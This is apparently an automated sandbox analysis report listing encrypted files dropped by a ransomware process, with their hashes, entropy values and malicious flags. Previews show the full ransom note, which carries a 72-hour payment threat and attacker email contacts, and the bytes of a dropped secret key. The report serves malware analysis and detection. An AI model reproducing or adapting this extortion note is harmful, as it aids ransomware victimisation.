                                                                                                    SHA-256:4A6F073D9F79D176DD3AE28F2BC130B6B14C552B6EDA66F9A10E4A9C5240CD7F
                                                                                                    SHA-512:86531CEB4F42EA6E61DF7F6178CF03CA55281C7CBCC280B1353E345196404E329FC815C8B096580E25732BF88197A68C176892A60D29EBCFB5FB591E3848FC3A
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1138
                                                                                                    Entropy (8bit):7.834588633742998
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:TmUF7EFrZAF5y1J7LIooUrX4afnHZOTqMFLPSflhxyYl:KIEFNAFsL7ke8aHsOuPKlhA6
                                                                                                    MD5:224BAD582E0D016D0B5BE70EEA543973
                                                                                                    SHA1:144827A4E0D3396AFBD2B653BB853B25D4D71AA9
                                                                                                    SHA-256:96F2C98B221742B6D778453E2A0CB8D722E458D885F0FFCED642248BF8C81066
                                                                                                    SHA-512:C87147F876A53239225A245829599E65DF5D0B134C391C92D33AEBB00E663A4024C10087C803C4E71F0EB5DD9105CFD97314FC0390633420E0EEC5FF11E5B259
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1138
                                                                                                    Entropy (8bit):7.834588633742998
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:TmUF7EFrZAF5y1J7LIooUrX4afnHZOTqMFLPSflhxyYl:KIEFNAFsL7ke8aHsOuPKlhA6
                                                                                                    MD5:224BAD582E0D016D0B5BE70EEA543973
                                                                                                    SHA1:144827A4E0D3396AFBD2B653BB853B25D4D71AA9
                                                                                                    SHA-256:96F2C98B221742B6D778453E2A0CB8D722E458D885F0FFCED642248BF8C81066
                                                                                                    SHA-512:C87147F876A53239225A245829599E65DF5D0B134C391C92D33AEBB00E663A4024C10087C803C4E71F0EB5DD9105CFD97314FC0390633420E0EEC5FF11E5B259
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2208
                                                                                                    Entropy (8bit):7.914967425822004
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:/pqh9k/JtG+0m6jIpZhkwHJfAd/SE0LBJ5fLCafszAjaZf4:/pu9kh50mxpp/9RNQAOZf4
                                                                                                    MD5:D9735F19BAD48D845A87BD3EFB0B4579
                                                                                                    SHA1:F3211D59E1AA7A26D093BA186033BE74EEC9485D
                                                                                                    SHA-256:1EBD4CB9403FBC0C878ECB2A073B22EAF96CF72F6BAEE64DB6CC58392BB1B138
                                                                                                    SHA-512:A3369B1F8A9F6D38C6B6E5F0EC2A0064C13CBB86236925FA67364702B08E447EADEC5B3AA12715B72FED84FB99EC0B51245E21F966A6863903761403C52DD773
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2208
                                                                                                    Entropy (8bit):7.914967425822004
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:/pqh9k/JtG+0m6jIpZhkwHJfAd/SE0LBJ5fLCafszAjaZf4:/pu9kh50mxpp/9RNQAOZf4
                                                                                                    MD5:D9735F19BAD48D845A87BD3EFB0B4579
                                                                                                    SHA1:F3211D59E1AA7A26D093BA186033BE74EEC9485D
                                                                                                    SHA-256:1EBD4CB9403FBC0C878ECB2A073B22EAF96CF72F6BAEE64DB6CC58392BB1B138
                                                                                                    SHA-512:A3369B1F8A9F6D38C6B6E5F0EC2A0064C13CBB86236925FA67364702B08E447EADEC5B3AA12715B72FED84FB99EC0B51245E21F966A6863903761403C52DD773
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1843
                                                                                                    Entropy (8bit):7.876989094512191
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:khjN5UqqXOjHHC9xqLrfZm7NcIAOFoM6yGn5H:kbvpHaqLrM1yM6y4R
                                                                                                    MD5:38C3B9FA6F1FF0BADFEEAB226BE736B2
                                                                                                    SHA1:0723E04BE5AD55FB878C511CFB92A8D76A9D7898
                                                                                                    SHA-256:0C534EF1761E202F30FC97DF20A6630B1D157C6ACA4DDF11ACBA4772B3744EE2
                                                                                                    SHA-512:0D843125056B4BFC78287863D7A2A2202CF1B8A43D44396D9570E300C41AEA9D51380869DAF9F507191D5E85006C69EB6662AB286B3F04D744BD3DBB4A026EF7
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1843
                                                                                                    Entropy (8bit):7.876989094512191
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:khjN5UqqXOjHHC9xqLrfZm7NcIAOFoM6yGn5H:kbvpHaqLrM1yM6y4R
                                                                                                    MD5:38C3B9FA6F1FF0BADFEEAB226BE736B2
                                                                                                    SHA1:0723E04BE5AD55FB878C511CFB92A8D76A9D7898
                                                                                                    SHA-256:0C534EF1761E202F30FC97DF20A6630B1D157C6ACA4DDF11ACBA4772B3744EE2
                                                                                                    SHA-512:0D843125056B4BFC78287863D7A2A2202CF1B8A43D44396D9570E300C41AEA9D51380869DAF9F507191D5E85006C69EB6662AB286B3F04D744BD3DBB4A026EF7
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1842
                                                                                                    Entropy (8bit):7.881728183714136
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:cIlMYszBW5X/LzBo70jBbyL97qgH7cz/UT4ZNRro:c/ZYl/BbRwEU0Zz0
                                                                                                    MD5:277F44DCE6B948016170E9B057EE5646
                                                                                                    SHA1:214ACCD7ECC91D2003D44BFD73439F81083326E7
                                                                                                    SHA-256:5AE408ABAE3410E1CD8337DE5FE7DE03DFC8BB6EDE6DD5FA6325A4AB9D44E4BA
                                                                                                    SHA-512:07BE0DF9501C705AADC7EBC7B20B4CCB08A2EF4569FE45E6CBBB7C2DB680C3433B7BE77F12F5CE407272EA896F593B4A7823EF4FD4034BF8C8E392AA6EEA665C
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1842
                                                                                                    Entropy (8bit):7.881728183714136
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:cIlMYszBW5X/LzBo70jBbyL97qgH7cz/UT4ZNRro:c/ZYl/BbRwEU0Zz0
                                                                                                    MD5:277F44DCE6B948016170E9B057EE5646
                                                                                                    SHA1:214ACCD7ECC91D2003D44BFD73439F81083326E7
                                                                                                    SHA-256:5AE408ABAE3410E1CD8337DE5FE7DE03DFC8BB6EDE6DD5FA6325A4AB9D44E4BA
                                                                                                    SHA-512:07BE0DF9501C705AADC7EBC7B20B4CCB08A2EF4569FE45E6CBBB7C2DB680C3433B7BE77F12F5CE407272EA896F593B4A7823EF4FD4034BF8C8E392AA6EEA665C
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1139
                                                                                                    Entropy (8bit):7.844278626652945
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:RB0sRqGd9JrFTm7ap/Mcb8v/Mmr48DQabRuffEGlEHPhV:b0sl9JrFUO/pbkUmFDQab0HuvD
                                                                                                    MD5:AD494A07A263BBDD2CAB3E2EDEB6A595
                                                                                                    SHA1:0A8F9967893CFE83D726B9C23D96C6048EF49561
                                                                                                    SHA-256:E758A13336C1BCE7DA179C12A06E11DA52CA447F57EF683DDBC9DF04734C5E7E
                                                                                                    SHA-512:0E88D649D090C8BCFCCAC5FF6396A7C46EDCDA0AD02AE67552EAE15F52C5554D804FBB4B889A8A76EAD7DD24353D644E41BBF54D62FA73CEB8E7F0528AC317E5
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1139
                                                                                                    Entropy (8bit):7.844278626652945
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:RB0sRqGd9JrFTm7ap/Mcb8v/Mmr48DQabRuffEGlEHPhV:b0sl9JrFUO/pbkUmFDQab0HuvD
                                                                                                    MD5:AD494A07A263BBDD2CAB3E2EDEB6A595
                                                                                                    SHA1:0A8F9967893CFE83D726B9C23D96C6048EF49561
                                                                                                    SHA-256:E758A13336C1BCE7DA179C12A06E11DA52CA447F57EF683DDBC9DF04734C5E7E
                                                                                                    SHA-512:0E88D649D090C8BCFCCAC5FF6396A7C46EDCDA0AD02AE67552EAE15F52C5554D804FBB4B889A8A76EAD7DD24353D644E41BBF54D62FA73CEB8E7F0528AC317E5
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:OpenPGP Public Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1392
                                                                                                    Entropy (8bit):7.849756750075427
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Dx8hkJoYqQDL0tzCz967m0e+QqdYvXqewMXDeI8IE+lI8g6XVzgYWkm3:DxUDYqDo6mnqdYvXqezpEXylUso
                                                                                                    MD5:F648F6E39BE4C93629936A3D4EE334B8
                                                                                                    SHA1:57899BE3E6E095D18D23F38DFD1BBAF46BF68CB7
                                                                                                    SHA-256:52C5C404EBA4B61A810F436722B6F9C99705DA1F5BF193B3827AE7B6435642AB
                                                                                                    SHA-512:ADF4E766B69DAF531B184FFD4FC47ABCF7324A089E764246829919CC93BAD3BC4379859F235D6D3130CCDB5C6ED44B81B81C98DDCB6206D41A19E5F7807C12A3
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:OpenPGP Public Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1392
                                                                                                    Entropy (8bit):7.849756750075427
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Dx8hkJoYqQDL0tzCz967m0e+QqdYvXqewMXDeI8IE+lI8g6XVzgYWkm3:DxUDYqDo6mnqdYvXqezpEXylUso
                                                                                                    MD5:F648F6E39BE4C93629936A3D4EE334B8
                                                                                                    SHA1:57899BE3E6E095D18D23F38DFD1BBAF46BF68CB7
                                                                                                    SHA-256:52C5C404EBA4B61A810F436722B6F9C99705DA1F5BF193B3827AE7B6435642AB
                                                                                                    SHA-512:ADF4E766B69DAF531B184FFD4FC47ABCF7324A089E764246829919CC93BAD3BC4379859F235D6D3130CCDB5C6ED44B81B81C98DDCB6206D41A19E5F7807C12A3
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1824
                                                                                                    Entropy (8bit):7.895651720783217
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:+atNS/myqd8ZsMvT0SHBxUqty+wEMdWUckok52hxWDKD:+6NADqd2si0SHBxHy+wEM8FW52Td
                                                                                                    MD5:4572A202A2421F25B63F802E164D1CCA
                                                                                                    SHA1:AD9AFF18BE00AEEF3CEDCDDE33E7DDD70354A4A7
                                                                                                    SHA-256:9DC98F3EC7A21DFB4D28978952D198F0B32BE72F858EBF874432472A94E3100B
                                                                                                    SHA-512:9F21D25EEB2CA8D5D81C7A93119541855A688F2C8C6C61EBBA2C28D2FC14DB82413BBF618866767FACE8ADDE8094878A5EBA70B4A8C45D98C0EA58DF66E6915B
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1824
                                                                                                    Entropy (8bit):7.895651720783217
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:+atNS/myqd8ZsMvT0SHBxUqty+wEMdWUckok52hxWDKD:+6NADqd2si0SHBxHy+wEM8FW52Td
                                                                                                    MD5:4572A202A2421F25B63F802E164D1CCA
                                                                                                    SHA1:AD9AFF18BE00AEEF3CEDCDDE33E7DDD70354A4A7
                                                                                                    SHA-256:9DC98F3EC7A21DFB4D28978952D198F0B32BE72F858EBF874432472A94E3100B
                                                                                                    SHA-512:9F21D25EEB2CA8D5D81C7A93119541855A688F2C8C6C61EBBA2C28D2FC14DB82413BBF618866767FACE8ADDE8094878A5EBA70B4A8C45D98C0EA58DF66E6915B
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1388
                                                                                                    Entropy (8bit):7.849859943661051
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:dhpsertiuIEJ3AcHuQ8aXi6nrA2zRHCwWmrbD5O12Ch48dil4Ye+B:me5J3AcORh6nr7jbotLK4aB
                                                                                                    MD5:CDD2AF745399974051344870F63BBB61
                                                                                                    SHA1:113380D7682ECE97C79D6C21E628268A60756F35
                                                                                                    SHA-256:3CF831C4B6FB59833AA983267A2358639CBEE3FCA9DA037E420B5E33CB973A39
                                                                                                    SHA-512:57EA05012C5812C8D958EC8F8ED8EBF874125A94E30BB31DD6F6FB03858E4F0057F50E371D0B9B6337BC8AB9E0C22FADF5D04FB22D0E17E1A48C16766D67FFA4
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1388
                                                                                                    Entropy (8bit):7.849859943661051
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:dhpsertiuIEJ3AcHuQ8aXi6nrA2zRHCwWmrbD5O12Ch48dil4Ye+B:me5J3AcORh6nr7jbotLK4aB
                                                                                                    MD5:CDD2AF745399974051344870F63BBB61
                                                                                                    SHA1:113380D7682ECE97C79D6C21E628268A60756F35
                                                                                                    SHA-256:3CF831C4B6FB59833AA983267A2358639CBEE3FCA9DA037E420B5E33CB973A39
                                                                                                    SHA-512:57EA05012C5812C8D958EC8F8ED8EBF874125A94E30BB31DD6F6FB03858E4F0057F50E371D0B9B6337BC8AB9E0C22FADF5D04FB22D0E17E1A48C16766D67FFA4
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1127
                                                                                                    Entropy (8bit):7.830113508196423
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:PA6V21XcA+YXbjo6pQbpBNVd25h9rttDpCyp6yYW7qpiNSb27Uzg:PA+8Xbjo8QbpBXd4FDp6jkA0
                                                                                                    MD5:21D29B8CE9DE492657C0DA576D614EC3
                                                                                                    SHA1:1C0F1545BC9370C4CEF6AE462DD8645238DB24D2
                                                                                                    SHA-256:7D8D2A9294B0F282B39F9477CCFC7201F01C1F7DFD2968961F9BD1146CFC2C33
                                                                                                    SHA-512:D19B3561FFF5E09E461707CE883FA8A850680FA0D030E2E7C9AA869E03C3F5569928AE119DF0F23F715040DCBB12B4F0381E7827F35C69EF618BC7C746E51067
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1127
                                                                                                    Entropy (8bit):7.830113508196423
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:PA6V21XcA+YXbjo6pQbpBNVd25h9rttDpCyp6yYW7qpiNSb27Uzg:PA+8Xbjo8QbpBXd4FDp6jkA0
                                                                                                    MD5:21D29B8CE9DE492657C0DA576D614EC3
                                                                                                    SHA1:1C0F1545BC9370C4CEF6AE462DD8645238DB24D2
                                                                                                    SHA-256:7D8D2A9294B0F282B39F9477CCFC7201F01C1F7DFD2968961F9BD1146CFC2C33
                                                                                                    SHA-512:D19B3561FFF5E09E461707CE883FA8A850680FA0D030E2E7C9AA869E03C3F5569928AE119DF0F23F715040DCBB12B4F0381E7827F35C69EF618BC7C746E51067
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1824
                                                                                                    Entropy (8bit):7.888420215256392
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:WpisGHti3AHl0l885xgidXrGscPtXpzA4Yc2:Wp/GM3u6d5xgidKv1Yc2
                                                                                                    MD5:4EAE87A5D88B1700285204DD232380F7
                                                                                                    SHA1:58B75B08217BD3E7ED6A77CDC5BB599F8EFD298F
                                                                                                    SHA-256:8117EA0472D5DD4DCC007A7ADA6D8780BB1F3721DABD17CF043C297BE0ADB43C
                                                                                                    SHA-512:9C80175AD937A9D046976D491AF07707F07DB437997EEA3E40CFC4B0FBFC5AC2CA86F364ED87B0DF3EE76B05C50D993923C839CC4239DC612F21EB493580D894
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1824
                                                                                                    Entropy (8bit):7.888420215256392
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:WpisGHti3AHl0l885xgidXrGscPtXpzA4Yc2:Wp/GM3u6d5xgidKv1Yc2
                                                                                                    MD5:4EAE87A5D88B1700285204DD232380F7
                                                                                                    SHA1:58B75B08217BD3E7ED6A77CDC5BB599F8EFD298F
                                                                                                    SHA-256:8117EA0472D5DD4DCC007A7ADA6D8780BB1F3721DABD17CF043C297BE0ADB43C
                                                                                                    SHA-512:9C80175AD937A9D046976D491AF07707F07DB437997EEA3E40CFC4B0FBFC5AC2CA86F364ED87B0DF3EE76B05C50D993923C839CC4239DC612F21EB493580D894
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1068
                                                                                                    Entropy (8bit):7.812529440273856
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:KgGkI7FDR53PGkOnZYxquDXfrRJPK6kU/H6Ge52OOm3pfjo:KNkQFDR5/GkmZYxquL/yiH6Ge5Nk
                                                                                                    MD5:CBA042D6C52F692F4812E74278D7F427
                                                                                                    SHA1:B6DA23AEDA9798A004E705953FA2514FDEF268AA
                                                                                                    SHA-256:9E6AD4BDEE343E8142026230559E330037C868FAC6F5975FCD976AAEA0ECB3DA
                                                                                                    SHA-512:9756E4B991EFEDB7698D07FA58D21BF323768B71A6A274401D9627A882BB89472182F177E650526D2F43B4B9476D90F2A53D382F038B93FC5D380AE58AA175BB
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1068
                                                                                                    Entropy (8bit):7.812529440273856
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:KgGkI7FDR53PGkOnZYxquDXfrRJPK6kU/H6Ge52OOm3pfjo:KNkQFDR5/GkmZYxquL/yiH6Ge5Nk
                                                                                                    MD5:CBA042D6C52F692F4812E74278D7F427
                                                                                                    SHA1:B6DA23AEDA9798A004E705953FA2514FDEF268AA
                                                                                                    SHA-256:9E6AD4BDEE343E8142026230559E330037C868FAC6F5975FCD976AAEA0ECB3DA
                                                                                                    SHA-512:9756E4B991EFEDB7698D07FA58D21BF323768B71A6A274401D9627A882BB89472182F177E650526D2F43B4B9476D90F2A53D382F038B93FC5D380AE58AA175BB
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1824
                                                                                                    Entropy (8bit):7.895848694052735
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:Eij3btVA8BbE1h0eVg4RDDPOEfLAIeqBycuXcxMtOA:hj3HA8xE1fg4JPOytuXftOA
                                                                                                    MD5:85923B5A754AF344F030528C9CAA5012
                                                                                                    SHA1:EB603370D6561DB26103039A1E8A2A5AA4D994AC
                                                                                                    SHA-256:CAB736F90B8159A6571506935CDCF45644E7FA8EC193E955FB2FDFFBEE042BD8
                                                                                                    SHA-512:7C98E3F0B620974A55C97771D8766B87E107EFC3395F20AE6E2BC7B094B0571C9D35C367FD40EB62AE67D7B6C0765C8CD728871DE9A8DD97FA7867E3F769B0E4
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1824
                                                                                                    Entropy (8bit):7.895848694052735
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:Eij3btVA8BbE1h0eVg4RDDPOEfLAIeqBycuXcxMtOA:hj3HA8xE1fg4JPOytuXftOA
                                                                                                    MD5:85923B5A754AF344F030528C9CAA5012
                                                                                                    SHA1:EB603370D6561DB26103039A1E8A2A5AA4D994AC
                                                                                                    SHA-256:CAB736F90B8159A6571506935CDCF45644E7FA8EC193E955FB2FDFFBEE042BD8
                                                                                                    SHA-512:7C98E3F0B620974A55C97771D8766B87E107EFC3395F20AE6E2BC7B094B0571C9D35C367FD40EB62AE67D7B6C0765C8CD728871DE9A8DD97FA7867E3F769B0E4
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:OpenPGP Secret Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):427
                                                                                                    Entropy (8bit):7.477303415598996
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:nGIt7hXzZrq7Gsh6ysquZ6Zx3t2L0JO+E+MXniBBscfln:n/a7GszDZxtnJO+wjcfl
                                                                                                    MD5:BFE6C24FA1BD78BF29FCF87BAACB99AC
                                                                                                    SHA1:76E7F27CA51FD1D1C73EA9D2FDB1921638A0A006
                                                                                                    SHA-256:5CE04C752BE52EEDF1E319CEB61DBC42B4C5143132D669EC5C1742997E5337B1
                                                                                                    SHA-512:A4CBD10812E78F40107763CED7B8A1EB63A5E779EDA3BF93A534517BE8D4B7A1877B404D4B8B3260234E6A0FFAB024879DA0C2B6DE9D2EB614D82F785E9D3C7F
                                                                                                    Malicious:true
                                                                                                    Preview:.T..Y.8...."........U9A.h..'.(aR......n-...]Ux...`.kl....ll../.}:i#.!....R^..%/......RF...s.O.W.......(......HfX.E.....nB:.0-XS..."...:......yu....h.aL..}@.b!.'.iu.D.7..M(.,.`......Q...........5.....L.n1u..........m..........|.g.....P.....d.{O.<..)P..U....J.{h..b.B...l....NCP.......Z..~..}.J.d.L..|.K......x=De.L}.#?#.mL.........P.C..{U...V.}.P.....a.2.U.l..M.....f.%..O.Y..B.08J....A. z6]G.U.R..CY0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:OpenPGP Secret Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):427
                                                                                                    Entropy (8bit):7.477303415598996
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:nGIt7hXzZrq7Gsh6ysquZ6Zx3t2L0JO+E+MXniBBscfln:n/a7GszDZxtnJO+wjcfl
                                                                                                    MD5:BFE6C24FA1BD78BF29FCF87BAACB99AC
                                                                                                    SHA1:76E7F27CA51FD1D1C73EA9D2FDB1921638A0A006
                                                                                                    SHA-256:5CE04C752BE52EEDF1E319CEB61DBC42B4C5143132D669EC5C1742997E5337B1
                                                                                                    SHA-512:A4CBD10812E78F40107763CED7B8A1EB63A5E779EDA3BF93A534517BE8D4B7A1877B404D4B8B3260234E6A0FFAB024879DA0C2B6DE9D2EB614D82F785E9D3C7F
                                                                                                    Malicious:false
                                                                                                    Preview:.T..Y.8...."........U9A.h..'.(aR......n-...]Ux...`.kl....ll../.}:i#.!....R^..%/......RF...s.O.W.......(......HfX.E.....nB:.0-XS..."...:......yu....h.aL..}@.b!.'.iu.D.7..M(.,.`......Q...........5.....L.n1u..........m..........|.g.....P.....d.{O.<..)P..U....J.{h..b.B...l....NCP.......Z..~..}.J.d.L..|.K......x=De.L}.#?#.mL.........P.C..{U...V.}.P.....a.2.U.l..M.....f.%..O.Y..B.08J....A. z6]G.U.R..CY0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):317
                                                                                                    Entropy (8bit):7.29672527944937
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:YWPQ1sj8W/0jqlULBgZy0bDDPYh07kLmBAQYg8ohGKKFMy9VP/lGhXLNIhNSn:YvM8W8jqvDDPYh06mlYKIlGUSn
                                                                                                    MD5:2A9DAC70BB85F281B67C9FEE606098EE
                                                                                                    SHA1:A2DF3A9AD8556F79C27149BDC5A2688273DE106A
                                                                                                    SHA-256:3AF3AA0E6F29A46618F0E91562CD9C48468C411D07B9AD411269861E96FACF5B
                                                                                                    SHA-512:AD92826B8D3B3EB165AE79A92E18D0F9F17E9A5319F56C58CCFD3DC9DBA7EEAFB572981A4CAB75637FF7D626B45717B65B31BE73B4955735BA40915D376D6686
                                                                                                    Malicious:true
